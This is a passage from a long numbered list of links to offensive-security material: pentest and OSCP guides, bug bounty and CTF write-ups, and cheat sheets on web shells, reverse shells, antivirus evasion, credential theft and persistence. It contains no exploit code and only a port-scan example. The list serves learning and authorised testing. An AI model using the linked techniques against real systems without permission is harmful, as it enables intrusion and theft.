https://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux -1865-Penetration Testing: https://www.hackingarticles.in/Penetration-Testing -1866-Buffer Overflow Examples, Code execution by shellcode : https://0xrick.github.io/binary-exploitation/bof5 -1867-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution -1868-JSC Exploits: -https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html -1869-Injecting Into The Hunt: https://jsecurity101.com/2019/Injecting-Into-The-Hunt -1870-Bypassing Antivirus with Golang: https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it -1871-Windows Process Injection: Print Spooler: https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler -1872-Inject Shellcode Into Memory Using Unicorn : https://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn -1873-Macros and More with SharpShooter v2.0: https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0 -1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing -1875-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1876-Hacking a social media account and safeguarding it: https://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7 -1877-OTP Bypass on India’s Biggest Video Sharing Site: https://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89 -1879-Getting Root on macOS via 3rd Party Backup Software: https://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9 -1880-How to Enumerate MYSQL Database using Metasploit: https://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html -1881-Exploiting Insecure Firebase Database! https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty -1882-Penetration Testing - Complete Guide: https://softwaretestinghelp.com/penetration-testing-guide -1883-How To Upload A PHP Web Shell On WordPress Site: https://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site -1884-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1885-Ethical hacking: Lateral movement techniques: https://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques -1886-A Pivot Cheatsheet for Pentesters: http://nullsweep.com/pivot-cheatsheet-for-pentesters -1887-What to Look for When Reverse Engineering Android Apps: http://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps -1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth: http://crackitdown.com/2019/02/modlishka-kali-linux.html -1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ): www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets -1890-The Complete Hashcat Tutorial: https://ethicalhackingguru.com/the-complete-hashcat-tutorial -1891-Wireless Wifi Penetration Testing Hacker Notes: https://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes -1892-#BugBounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1893-Kerberoasting attack: https://en.hackndo.com/kerberoasting -1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs): https://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs -1895-Radare2 cutter tutorial: http://cousbox.com/axflw/radare2-cutter-tutorial.html -1896-Cracking Password Hashes with Hashcat: http://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat -1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417: http://blog.wpsec.com/csrf-to-rce-wordpress -1898-Best OSINT Tools: http://pcwdld.com/osint-tools-and-software -1899-Metasploit Exploitation Tool 2020: http://cybervie.com/blog/metasploit-exploitation-tool -1900-How to exploit CVE-2020-7961: https://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html -1901-PowerShell for Pentesters: https://varonis.com/blog/powershell-for-pentesters -1902-Android Pentest Tutorial: https://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html -1903-Burp Suite Tutorial: https://pentestgeek.com/web-applications/burp-suite-tutorial-1 -1904-Company Email Enumeration + Breached Email Finder: https://metalkey.github.io/company-email-enumeration--breached-email-finder.html -1905-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -1906-Active Directory Exploitation Cheat Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound -1907-Advanced Hacking Tutorials Collection: https://yeahhub.com/advanced-hacking-tutorials-collection -1908-Persistence – DLL Hijacking: https://pentestlab.blog/2020/03/04/persistence-dll-hijacking -1909-Brute force and dictionary attacks: A cheat sheet: https://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet -1910-How to use Facebook for Open Source Investigation: https://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint -1911-tcpdump Cheat Sheet: https://comparitech.com/net-admin/tcpdump-cheat-sheet -1912-Windows Post exploitation recon with Metasploit: https://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit -1913-Bug Hunting Methodology: https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066 -1914-Malware traffic analysis tutorial: https://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html -1915-Recon-ng v5 Tutorial: https://geekwire.eu/recon-ng-v5-tutorial -1916-Windows and Linux Privilege Escalation Tools: https://yeahhub.com/windows-linux-privilege-escalation-tools-2019 -1917-Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide -1918-Phishing Windows Credentials: https://pentestlab.blog/2020/03/02/phishing-windows-credentials -1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials: https://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials -1920-Recent Papers Related To Fuzzing: https://wcventure.github.io/FuzzingPaper -1921-Web Shells 101 Using PHP (Web Shells Part 2): https://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ -1922-Python3 reverse shell: https://polisediltrading.it/hai6jzbs/python3-reverse-shell.html -1923-Reverse Shell between two Linux machines: https://yeahhub.com/reverse-shell-linux-machines -1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit): https://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html -1925-How to Use Wireshark: Comprehensive Tutorial + Tips: https://varonis.com/blog/how-to-use-wireshark -1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation? https://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts -1927-Ethical hacking:Top privilege escalation techniques in Windows: https://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows -1928-How to Identify Company's Hacked Email Addresses: https://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html -1929-Android APK Reverse Engineering: What's in an APK: https://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk -1930-Keep Calm and HackTheBox - Beep: https://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/ -1931-Keep Calm and HackTheBox -Legacy: https://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/ -1932-Keep Calm and HackTheBox -Lame: https://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/ -1933-HacktheBox:Writeup Walkthrough: https://hackingarticles.in/hack-the-box-writeup-walkthrough -1934-2020 OSCP Exam Preparation: https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp -1935-My OSCP transformation: https://kevsec.fr/journey-to-oscp-2019-write-up -1936-A Detailed Guide on OSCP Preparation: https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/ -1937-Useful Commands and Tools - #OSCP: https://yeahhub.com/useful-commands-tools-oscp/ -1938-Comprehensive Guide on Password Spraying Attack https://hackingarticles.in/comprehensive-guide-on-password-spraying-attack -1939-Privilege Escalation: https://pentestlab.blog/category/privilege-escalation/ -1940-Red Team: https://pentestlab.blog/category/red-team/ -1941-Linux post-exploitation.Advancing from user to super-user in a few clicks https://hackmag.com/security/linux-killchain/ -1942--#BugBounty Cheatsheet https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html -1943--#Windows Notes/Cheatsheet https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html -1944-#Linux Notes/Cheatsheet https://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html -1945-Windows Notes https://mad-coding.cn/tags/Windows/ -1946-#BlueTeam CheatSheet https://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d -1947-Linux Privilege Escalation Cheatsheet for OSCP: https://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html -1948-Shodan Pentesting Guide: https://community.turgensec.com/shodan-pentesting-guide -1949-Pentesters Guide to PostgreSQL Hacking: https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 -1950-Hacking-OSCP cheatsheet: https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/ -1951-A Comprehensive Guide to Breaking SSH: https://community.turgensec.com/ssh-hacking-guide -1952-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -1953-Best #firefox addons for #Hacking: https://twitter.com/cry__pto/status/1210836734331752449 -1954-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1955-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join: https://facebook.com/groups/AmmarAmerHacker -1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools: https://twitter.com/cry__pto/status/1270603017256124416 -1958-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1959-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1960-Website Mirroring Tools: https://twitter.com/cry__pto/status/1248640849812078593 -1961-automated credential discovery tools: https://twitter.com/cry__pto/status/1253214720372465665 -1962-Antiforensics Techniques: https://twitter.com/cry__pto/status/1215001674760294400 -1963-#bugbounty tools part (1): https://twitter.com/cry__pto/status/1212096231301881857 1964-Binary Analysis Frameworks: https://twitter.com/cry__pto/status/1207966421575184384 -1965-#BugBounty tools part (5): https://twitter.com/cry__pto/status/1214850754055458819 -1966-#BugBounty tools part (3): https://twitter.com/cry__pto/status/1212290510922158080 -1967-Kali Linux Commands List (Cheat Sheet): https://twitter.com/cry__pto/status/1264530546933272576 -1968-#BugBounty tools part (4): https://twitter.com/cry__pto/status/1212296173412851712 -1969--Automated enumeration tools: https://twitter.com/cry__pto/status/1214919232389099521 -1970-DNS lookup information Tools: https://twitter.com/cry__pto/status/1248639962746105863 -1971-OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1972-Social Engineering Tools: https://twitter.com/cry__pto/status/1180731438796333056 -1973-Hydra : https://twitter.com/cry__pto/status/1247507926807449600 -1974-#OSINT Your Full Guide: https://twitter.com/cry__pto/status/1244433669936349184 -1975-#BugBounty tools part (2): https://twitter.com/cry__pto/status/1212289852059860992 -1976-my own ebook library: https://twitter.com/cry__pto/status/1239308541468516354 -1977-Practice part (2): https://twitter.com/cry__pto/status/1213165695556567040 -1978-Practice part (3): https://twitter.com/cry__pto/status/1214220715337097222 -1979-my blog: https://twitter.com/cry__pto/status/1263457516672954368 -1980-Practice: https://twitter.com/cry__pto/status/1212341774569504769 -1981-how to search for XSS without proxy tool: https://twitter.com/cry__pto/status/1252558806837604352 -1982-How to collect email addresses from search engines: https://twitter.com/cry__pto/status/1058864931792138240 -1983-Hacking Tools Cheat Sheet: https://twitter.com/cry__pto/status/1255159507891687426 -1984-#OSCP Your Full Guide: https://twitter.com/cry__pto/status/1240842587927445504 -1985-#HackTheBox Your Full Guide: https://twitter.com/cry__pto/status/1241481478539816961 -1986-Web Scanners: https://twitter.com/cry__pto/status/1271826773009928194 -1987-HACKING MAGAZINES: -1-2600 — The Hacker Quarterly magazine:www.2600.com -2-Hackin9:http://hakin9.org -3-(IN)SECURE magazine:https://lnkd.in/grNM2t8 -4-PHRACK:www.phrack.org/archives -5-Hacker’s Manual 2019 -1988-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1989-Kali Linux Cheat Sheet for Hackers: https://twitter.com/cry__pto/status/1272792311236263937 -1990-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1992-100 Best Hacking Tools for Security Professionals in 2020: https://gbhackers.com/hacking-tools-list/ -1993-SNMP Enumeration: OpUtils:www.manageengine.com SNMP Informant:www.snmp-informant.com SNMP Scanner:www.secure-bytes.com SNMPUtil:www.wtcs.org SolarWinds:www.solarwinds.com -1994-INFO-SEC RELATED CHEAT SHEETS: https://twitter.com/cry__pto/status/1274768435361337346 -1995-METASPLOIT CHEAT SHEET: https://twitter.com/cry__pto/status/1274769179548278786 -1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus: https://twitter.com/cry__pto/status/1275359087304286210 -1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More: https://twitter.com/cry__pto/status/1276391703906222080 -1998-learn penetration testing a great series as PDF: https://twitter.com/cry__pto/status/1277588369426526209 -1999-Detecting secrets in code committed to Gitlab (in real time): https://www.youtube.com/watch?v=eCDgUvXZ_YE -2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code Grants: https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html -2001-Building Virtual Machine Labs: https://github.com/da667/Building_Virtual_Machine_Labs-Live_Training -2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]: https://kakyouim.hatenablog.com/entry/2020/05/27/010807 -2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools): https://softwaretestinghelp.com/penetration-testing-tools/ -2004-Full Connect Scan (-sT): -complete the three-way handshake -slower than SYN scan -no need for superuser Privileges -when stealth is not required -to know for sure which port is open -when running port scan via proxies like TOR -it can be detected nmap -sT -p 80 192.168.1.110 -2005-today i learned that you can use strings command to extract email addresses from binary files: strings -n 8 /usr/bin/who | grep '@' -2005-pentest cheat sheet : https://gist.github.com/githubfoam/4d3c99383b5372ee019c8fbc7581637d -2006-Tcpdump cheat sheet : https://gist.github.com/jforge/27962c52223ea9b8003b22b8189d93fb -2007-tcpdump - reading tcp flags : https://gist.github.com/tuxfight3r/9ac030cb0d707bb446c7 -2008-CTF-Notes - Hackers Resources Galore: https://github.com/TheSecEng/CTF-notes -2009-Pentest-Cheat-Sheets: https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets -2010--2-Web Application Cheatsheet (Vulnhub): https://github.com/Ignitetechnologies/Web-Application-Cheatsheet -2011-A cheatsheet with commands that can be used to perform kerberos attacks : https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a -2012-Master Shodan Search Engine: https://rootkitpen.blogspot.com/2020/08/master-shodan-search-engine.html -2013-CTF Cheatsheet: https://github.com/uppusaikiran/awesome-ctf-cheatsheet -2014-Pentesting Cheatsheet: https://gist.github.com/jeremypruitt/c435aefa2c2abaec02985d77fb370ec5 -2015-Hacking Cheatsheet: https://github.com/kobs0N/Hacking-Cheatsheet -2016-Hashcat-Cheatsheet: https://github.com/frizb/Hashcat-Cheatsheet -2017-Wireshark Cheat Sheet: https://github.com/security-cheatsheet/wireshark-cheatsheet -2018-JustTryHarder: https://github.com/sinfulz/JustTryHarder -2019-PWK-CheatSheet: https://github.com/ibr2/pwk-cheatsheet -2020-kali linux cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -2021-Hydra-Cheatsheet: https://github.com/frizb/Hydra-Cheatsheet -2022-Security Tools Cheatsheets: https://github.com/jayeshjodhawat -2023-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit: https://www.trustedsec.com/events/webinar-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit/ -2024-TRICKS FOR WEAPONIZING XSS: https://www.trustedsec.com/blog/tricks-for-weaponizing-xss/ -2025-OSCP Notes: https://github.com/tbowman01/OSCP-PWK-Notes-Public -2026-OSCP Notes: https://github.com/Technowlogy-Pushpender/oscp-notes -2027-list of useful commands, shells and notes related to OSCP: https://github.com/s0wr0b1ndef/OSCP-note -2028-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -2029-My OSCP notes: https://github.com/tagnullde/OSCP -2030-Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor https://www.allysonomalley.com/2020/05/22/dnsobserver/ -2031-Red Team Notes: https://dmcxblue.gitbook.io/red-team-notes/ -2032-Evading Detection with Excel 4.0 Macros and the BIFF8 XLS Format: https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls -2033-ESCALATING SUBDOMAIN TAKEOVERS TO STEAL COOKIES BY ABUSING DOCUMENT.DOMAIN: https://blog.takemyhand.xyz/2019/05/escalating-subdomain-takeovers-to-steal.html -2034-[SSTI] BREAKING GO'S TEMPLATE ENGINE TO GET XSS: https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html -2035-Metasploitable 3: https://kakyouim.hatenablog.com/entry/2020/02/16/213616 -2036-Reverse engineering and modifying an Android game: https://medium.com/swlh/reverse-engineering-and-modifying-an-android-game-apk-ctf-c617151b874c -2037-Reverse Engineering The Medium App (and making all stories in it free): https://medium.com/hackernoon/dont-publish-yet-reverse-engineering-the-medium-app-and-making-all-stories-in-it-free-48c8f2695687 -2038-Android Apk Reverse Engineering: https://medium.com/@chris.yn.chen/apk-reverse-engineering-df7ed8cec191 -2039-DIY Web App Pentesting Guide: https://medium.com/@luke_83192/diy-web-app-pentesting-guide-be54b303c6eb -2040-Local Admin Access and Group Policy Don’t Mix: https://www.trustedsec.com/blog/local-admin-access-and-group-policy-dont-mix/ -2041-BREAKING TYPICAL WINDOWS HARDENING IMPLEMENTATIONS: https://www.trustedsec.com/blog/breaking-typical-windows-hardening-implementations/ -2042-Decrypting ADSync passwords - my journey into DPAPI: https://o365blog.com/post/adsync/ -2043-Ultimate Guide: PostgreSQL Pentesting: https://medium.com/@lordhorcrux_/ultimate-guide-postgresql-pentesting-989055d5551e -2044-SMB Enumeration for Penetration Testing: https://medium.com/@arnavtripathy98/smb-enumeration-for-penetration-testing-e782a328bf1b -2045-(Almost) All The Ways to File Transfer: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65 -2046-HackTheBox TartarSauce Writeup: https://kakyouim.hatenablog.com/entry/2020/05/14/230445 -2047-Kerberos-Attacks-In-Depth: https://m0chan.github.io/Kerberos-Attacks-In-Depth -2048-From Recon to Bypassing MFA Implementation in OWA by Using EWS Misconfiguration: https://medium.com/bugbountywriteup/from-recon-to-bypassing-mfa-implementation-in-owa-by-using-ews-misconfiguration-b6a3518b0a63 -2049-Writeups for infosec Capture the Flag events by team Galaxians: https://github.com/shiltemann/CTF-writeups-public -2050-Angstrom CTF 2018 — web challenges [writeup]: https://medium.com/bugbountywriteup/angstrom-ctf-2018-web-challenges-writeup-8a69998b0123 -2051-How to get started in CTF | Complete Begineer Guide: https://medium.com/bugbountywriteup/how-to-get-started-in-ctf-complete-begineer-guide-15ab5a6856d -2052-Hacking 101: An Ethical Hackers Guide for Getting from Beginner to Professional: https://medium.com/@gavinloughridge/hacking-101-an-ethical-hackers-guide-for-getting-from-beginner-to-professional-cd1fac182ff1 -2053-Reconnaissance the key to Ethical Hacking!: https://medium.com/techloop/reconnaissance-the-key-to-ethical-hacking-3b853510d977 -2054-Day 18: Essential CTF Tools: https://medium.com/@int0x33/day-18-essential-ctf-tools-1f9af1552214 -2055-OSCP Cheatsheet: https://medium.com/oscp-cheatsheet/oscp-cheatsheet-6c80b9fa8d7e -2056-OSCP Cheat Sheet: https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad -2057-TryHackMe: vulnversity: https://medium.com/@ratiros01/tryhackme-vulnversity-42074b8644df -2058-Malware Analysis Tools And Resources: https://medium.com/@NasreddineBencherchali/malware-analysis-tools-and-resources-16eb17666886 -2059-Extracting Embedded Payloads From Malware: https://medium.com/@ryancor/extracting-embedded-payloads-from-malware-aaca8e9aa1a9 -2060-Attacks and Techniques Used Against WordPress Sites: https://www.trendmicro.com/en_us/research/19/l/looking-into-attacks-and-techniques-used-against-wordpress-sites.html -2061-Still Scanning IP Addresses? You’re Doing it Wrong: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/still-scanning-ip-addresses-you-re-doing-it-wrong/ -2062-Source Code Disclosure via Exposed .git Folder: https://medium.com/dev-genius/source-code-disclosure-via-exposed-git-folder-24993c7561f1 -2063-GitHub Recon - It’s Really Deep: https://medium.com/@shahjerry33/github-recon-its-really-deep-6553d6dfbb1f -2064-From SSRF to Compromise: Case Study: https://trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-ssrf-to-compromise-case-study/ -2065-Bug Hunting with Param Miner: Cache poisoning with XSS, a peculiar case: https://medium.com/bugbountywriteup/cache-poisoning-with-xss-a-peculiar-case-eb5973850814 -2066-Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability: https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/ -2067-Avoiding detection via dhcp options: https://sensepost.com/blog/2020/avoiding-detection-via-dhcp-options/ -2068-Bug Bytes #86 - Stealing local files with Safari, Prototype pollution vs HTML sanitizers & A hacker’s mom learning bug bounty: https://blog.intigriti.com/2020/09/02/bug-bytes-86-stealing-local-files-with-safari-prototype-pollution-vs-html-sanitizers-a-hackers-mom-learning-bug-bounty/ -2069-Bug Bytes #78 - BIG-IP RCE, Azure account takeover & Hunt scanner is back: https://blog.intigriti.com/2020/07/08/bug-bytes-78-big-ip-rce-azure-account-takeover-hunt-scanner-is-back/ -2070-Hacking a Telecommunication company(MTN): https://medium.com/@afolicdaralee/hacking-a-telecommunication-company-mtn-c46696451fed -2071-$20000 Facebook DOM XSS: https://vinothkumar.me/20000-facebook-dom-xss/ -2072-Backdooring WordPress with Phpsploit: https://blog.wpsec.com/backdooring-wordpress-with-phpsploit/ -2073-Pro tips for bugbounty: https://medium.com/@chawdamrunal/pro-tips-for-bug-bounty-f9982a5fc5e9 -2074-Collection Of #bugbountytips: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -2075-Offensive Netcat/Ncat: From Port Scanning To Bind Shell IP Whitelisting: https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da -2076-XSS for beginners: https://medium.com/swlh/xss-for-beginners-6752b1b1487d -2077-LET’S GO DEEP INTO OSINT: PART 1: medium.com/bugbountywriteup/lets-go-deep-into-osint-part-1-c2de4fe4f3bf -2087-Beginner’s Guide to recon automation: medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -2079-Automating Recon: https://medium.com/@amyrahm786/automating-recon-28b36dc2cf48 -2080-XSS WAF & Character limitation bypass like a boss: https://medium.com/bugbountywriteup/xss-waf-character-limitation-bypass-like-a-boss-2c788647c229 -2081-Chaining Improper Authorization To Race Condition To Harvest Credit Card Details : A Bug Bounty Story: https://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076 -2082-TryHackMe Linux Challenges: https://secjuice.com/write-up-10-tryhackme-linux-challenges-part-1/ -2083-Persistence – COM Hijacking: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ -2084-DLL Proxy Loading Your Favourite C# Implant https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/ -2085-how offensive actors use applescript for attacking macos: https://sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos -2086-Windows Privilege Escalation without Metasploit https://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666 -2087-Privilege Escalation in Windows: https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842 -2088-OSWE Prep — Hack The Box Magic: https://medium.com/@ranakhalil101/oswe-prep-hack-the-box-magic-f173e2d09125 -2089-Hackthebox | Bastion Writeup: https://medium.com/@_ncpd/hackthebox-bastion-writeup-9d6f6da3bcbb -2090-Hacking Android phone remotely using Metasploit: https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8 -2091-“Hacking with Metasploit” Tutorial: https://medium.com/cybersoton/hacking-with-metasploit-tutorial-7635b9d19e5 -2092-Hack The Box — Tally Writeup w/o Metasploit: https://medium.com/@ranakhalil101/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3 -2093-Burp Suite: https://medium.com/cyberdefendersprogram/burp-suite-webpage-enumeration-and-vulnerability-testing-cfd0b140570d -2094-h1–702 CTF — Web Challenge Write Up: https://medium.com/@amalmurali47/h1-702-ctf-web-challenge-write-up-53de31b2ddce -2095-SQL Injection & Remote Code Execution: https://medium.com/@shahjerry33/sql-injection-remote-code-execution-double-p1-6038ca88a2ec -2096-Juicy Infos hidden in js scripts leads to RCE : https://medium.com/@simobalghaoui/juicy-infos-hidden-in-js-scripts-lead-to-rce-5d4abbf24d9c -2097-Escalating Privileges like a Pro: https://gauravnarwani.com/escalating-privileges-like-a-pro/ -2098-Top 16 Active Directory Vulnerabilities: https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/ -2099-Windows Red Team Cheat Sheet: https://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/ -2100-OSCP: Developing a Methodology: https://medium.com/@falconspy/oscp-developing-a-methodology-32f4ab471fd6 -2101-Zero to OSCP: Concise Edition: https://medium.com/@1chidan/zero-to-oscp-concise-edition-b5ecd4a781c3 -2102-59 Hosts to Glory — Passing the OSCP: https://medium.com/@Tib3rius/59-hosts-to-glory-passing-the-oscp-acf0fd384371 -2103-Can We Automate Bug Bounties With Wfuzz? medium.com/better-programming/can-we-automate-earning-bug-bounties-with-wfuzz-c4e7a96810a5 -2104-Advanced boolean-based SQLi filter bypass techniques: https://www.secjuice.com/advanced-sqli-waf-bypass/ -2105-Beginners Guide On How You Can Use Javascript In BugBounty: https://medium.com/@patelkathan22/beginners-guide-on-how-you-can-use-javascript-in-bugbounty-492f6eb1f9ea -2106-OTP Bypass: medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89 -2107-How we Hijacked 26+ Subdomains: https://medium.com/@aishwaryakendle/how-we-hijacked-26-subdomains-9c05c94c7049 -2018-How to spot and exploit postMessage vulnerablities: https://medium.com/bugbountywriteup/how-to-spot-and-exploit-postmessage-vulnerablities-329079d307cc -2119-IDA Pro Tips to Add to Your Bag of Tricks: https://swarm.ptsecurity.com/ida-pro-tips/ -2120-N1QL Injection: Kind of SQL Injection in a NoSQL Database: https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database/ -2121-CSRF Protection Bypass in Play Framework: https://blog.doyensec.com/2020/08/20/playframework-csrf-bypass.html -2122-$25K Instagram Almost XSS Filter Link — Facebook Bug Bounty: https://medium.com/@alonnsoandres/25k-instagram-almost-xss-filter-link-facebook-bug-bounty-798b10c13b83 -2123-techniques for learning passwords: https://rootkitpen.blogspot.com/2020/09/techniques-for-learning-passwords.html -2124-How a simple CSRF attack turned into a P1: https://ladysecspeare.wordpress.com/2020/04/05/how-a-simple-csrf-attack-turned-into-a-p1-level-bug/ -2125-How I exploited the json csrf with method override technique: https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0 -2126-How I found CSRF(my first bounty): https://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d -2127-Exploiting websocket application wide XSS and CSRF: https://medium.com/@osamaavvan/exploiting-websocket-application-wide-xss-csrf-66e9e2ac8dfa -2128-Touch ID authentication Bypass on evernote and dropbox iOS apps: https://medium.com/@pig.wig45/touch-id-authentication-bypass-on-evernote-and-dropbox-ios-apps-7985219767b2 -2129-Oauth authentication bypass on airbnb acquistion using wierd 1 char open redirect: https://xpoc.pro/oauth-authentication-bypass-on-airbnb-acquisition-using-weird-1-char-open-redirect/ -2130-Two factor authentication bypass: https://gauravnarwani.com/two-factor-authentication-bypass/ -2132-Tricky oracle SQLI situation: https://blog.yappare.com/2020/04/tricky-oracle-sql-injection-situation.html -2133-CORS bug on google’s 404 page (rewarded): https://medium.com/@jayateerthag/cors-bug-on-googles-404-page-rewarded-2163d58d3c8b -2134-Subdomain takeover via unsecured s3 bucket: https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/ -2135-Subdomain takeover via wufoo service: https://www.mohamedharon.com/2019/02/subdomain-takeover-via-wufoo-service-in.html -2136-How I found CSRF(my first bounty): https://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d -2137-Race condition that could result to RCE a story with an app: https://medium.com/bugbountywriteup/race-condition-that-could-result-to-rce-a-story-with-an-app-that-temporary-stored-an-uploaded-9a4065368ba3 -2138-Creating thinking is our everything : Race condition and business logic: 